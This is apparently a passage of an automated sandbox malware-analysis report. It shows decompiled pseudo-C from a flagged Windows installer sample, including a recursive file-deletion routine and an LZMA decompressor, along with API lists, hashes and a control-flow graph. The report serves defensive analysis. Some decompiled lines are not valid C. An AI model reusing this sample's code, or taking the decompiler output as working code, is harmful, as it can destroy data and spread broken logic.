						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                    0x00405d7e
                                                                                    0x00405d83
                                                                                    0x00405d8c
                                                                                    0x00405d8f
                                                                                    0x00405d97
                                                                                    0x00405d9a
                                                                                    0x00405d9d
                                                                                    0x00405da5
                                                                                    0x00405da7
                                                                                    0x00405da8
                                                                                    0x00000000
                                                                                    0x00405da8
                                                                                    0x00405db3
                                                                                    0x00405db6
                                                                                    0x00405db6
                                                                                    0x00405db6
                                                                                    0x00405dba
                                                                                    0x00405dcd
                                                                                    0x00405dd4
                                                                                    0x00405dd9
                                                                                    0x00405ddd
                                                                                    0x00405ded
                                                                                    0x00405ddf
                                                                                    0x00405de5
                                                                                    0x00405de5
                                                                                    0x00405df2
                                                                                    0x00405df6
                                                                                    0x00405e02
                                                                                    0x00405e08
                                                                                    0x00405e0d
                                                                                    0x00405e13
                                                                                    0x00405e1e
                                                                                    0x00405e24
                                                                                    0x00405e26
                                                                                    0x00405e29
                                                                                    0x00405ed3
                                                                                    0x00405ed3
                                                                                    0x00405ed7
                                                                                    0x00405ed9
                                                                                    0x00405ed9
                                                                                    0x00405ed9
                                                                                    0x00405ed9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405e2f
                                                                                    0x00405e2f
                                                                                    0x00405e2f
                                                                                    0x00405e37
                                                                                    0x00405e57
                                                                                    0x00405e5f
                                                                                    0x00405e64
                                                                                    0x00405e6b
                                                                                    0x00405e86
                                                                                    0x00405e8b
                                                                                    0x00405e8d
                                                                                    0x00405eb1
                                                                                    0x00405e8f
                                                                                    0x00405e8f
                                                                                    0x00405e92
                                                                                    0x00405ea6
                                                                                    0x00405e94
                                                                                    0x00405e97
                                                                                    0x00405e9f
                                                                                    0x00405e9f
                                                                                    0x00405e92
                                                                                    0x00405e6d
                                                                                    0x00405e73
                                                                                    0x00405e75
                                                                                    0x00405e7b
                                                                                    0x00405e7b
                                                                                    0x00405e75
                                                                                    0x00000000
                                                                                    0x00405e6b
                                                                                    0x00405e39
                                                                                    0x00405e41
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405e43
                                                                                    0x00405e4b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405e4d
                                                                                    0x00405e55
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405eb6
                                                                                    0x00405ebe
                                                                                    0x00405ec4
                                                                                    0x00405ec4
                                                                                    0x00405ecd
                                                                                    0x00000000
                                                                                    0x00405ecd
                                                                                    0x00405df8
                                                                                    0x00405e00
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405dbc
                                                                                    0x00405dbc
                                                                                    0x00405dbe
                                                                                    0x00405ede
                                                                                    0x00405ee0
                                                                                    0x00405ee3
                                                                                    0x00405f34
                                                                                    0x00405f34
                                                                                    0x00405f34
                                                                                    0x00405ee5
                                                                                    0x00405ee8
                                                                                    0x00405ef3
                                                                                    0x00405ef8
                                                                                    0x00405efa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405efd
                                                                                    0x00405f09
                                                                                    0x00405f0e
                                                                                    0x00405f10
                                                                                    0x00000000
                                                                                    0x00405f2b
                                                                                    0x00405f12
                                                                                    0x00405f15
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405f1a
                                                                                    0x00000000
                                                                                    0x00405f21
                                                                                    0x00405eea
                                                                                    0x00405eea
                                                                                    0x00000000
                                                                                    0x00405eea
                                                                                    0x00405dc4
                                                                                    0x00405dc7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405dc7

                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,75213420,75212EE0,00000000), ref: 00405D9D
                                                                                    • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75213420,75212EE0,00000000), ref: 00405E0E
                                                                                    • FindFirstFileW.KERNELBASE(00425750,?,?,?,0040A014,?,00425750,?,?,75213420,75212EE0,00000000), ref: 00405E1E
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: .$.$PWB$\*.*
                                                                                    • API String ID: 2035342205-2468439962
                                                                                    • Opcode ID: 84a2dab94316d3ca87ace9b621727089dce8e4f508d821c3cecceca6b12cc675
                                                                                    • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                    • Opcode Fuzzy Hash: 84a2dab94316d3ca87ace9b621727089dce8e4f508d821c3cecceca6b12cc675
                                                                                    • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 729 406d5f-406d64 730 406dd5-406df3 729->730 731 406d66-406d95 729->731 734 4073cb-4073e0 730->734 732 406d97-406d9a 731->732 733 406d9c-406da0 731->733 735 406dac-406daf 732->735 738 406da2-406da6 733->738 739 406da8 733->739 736 4073e2-4073f8 734->736 737 4073fa-407410 734->737 741 406db1-406dba 735->741 742 406dcd-406dd0 735->742 740 407413-40741a 736->740 737->740 738->735 739->735 743 407441-40744d 740->743 744 40741c-407420 740->744 745 406dbc 741->745 746 406dbf-406dcb 741->746 747 406fa2-406fc0 742->747 757 406be3-406bec 743->757 750 407426-40743e 744->750 751 4075cf-4075d9 744->751 745->746 753 406e35-406e63 746->753 748 406fc2-406fd6 747->748 749 406fd8-406fea 747->749 756 406fed-406ff7 748->756 749->756 750->743 758 4075e5-4075f8 751->758 754 406e65-406e7d 753->754 755 406e7f-406e99 753->755 759 406e9c-406ea6 754->759 755->759 760 406ff9 756->760 761 406f9a-406fa0 756->761 762 406bf2 757->762 763 4075fa 757->763 764 4075fd-407601 758->764 766 406eac 759->766 767 406e1d-406e23 759->767 768 406f75-406f79 760->768 769 40710a-407117 760->769 761->747 765 406f3e-406f48 761->765 770 406bf9-406bfd 762->770 771 406d39-406d5a 762->771 772 406c9e-406ca2 762->772 773 406d0e-406d12 762->773 763->764 782 40758d-407597 765->782 783 406f4e-406f70 765->783 790 406e02-406e1a 766->790 791 407569-407573 766->791 784 406ed6-406edc 767->784 785 406e29-406e2f 767->785 774 407581-40758b 768->774 775 406f7f-406f97 768->775 769->757 770->758 779 406c03-406c10 770->779 771->734 776 406ca8-406cc1 772->776 777 40754e-407558 772->777 780 406d18-406d2c 773->780 781 40755d-407567 773->781 774->758 775->761 787 406cc4-406cc8 776->787 777->758 779->763 789 406c16-406c5c 779->789 792 406d2f-406d37 780->792 781->758 782->758 783->769 786 406f3a 784->786 788 406ede-406efc 784->788 785->753 785->786 786->765 787->772 793 406cca-406cd0 787->793 794 406f14-406f26 788->794 795 406efe-406f12 788->795 796 406c84-406c86 789->796 797 406c5e-406c62 789->797 790->767 791->758 792->771 792->773 800 406cd2-406cd9 793->800 801 406cfa-406d0c 793->801 802 406f29-406f33 794->802 795->802 798 406c94-406c9c 796->798 799 406c88-406c92 796->799 803 406c64-406c67 GlobalFree 797->803 804 406c6d-406c7b GlobalAlloc 797->804 798->787 799->798 799->799 805 406ce4-406cf4 GlobalAlloc 800->805 806 406cdb-406cde GlobalFree 800->806 801->792 802->784 807 406f35 802->807 803->804 804->763 808 406c81 804->808 805->763 805->801 806->805 810 407575-40757f 807->810 811 406ebb-406ed3 807->811 808->796 810->758 811->784
                                                                                    C-Code - Quality: 98%
                                                                                    			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
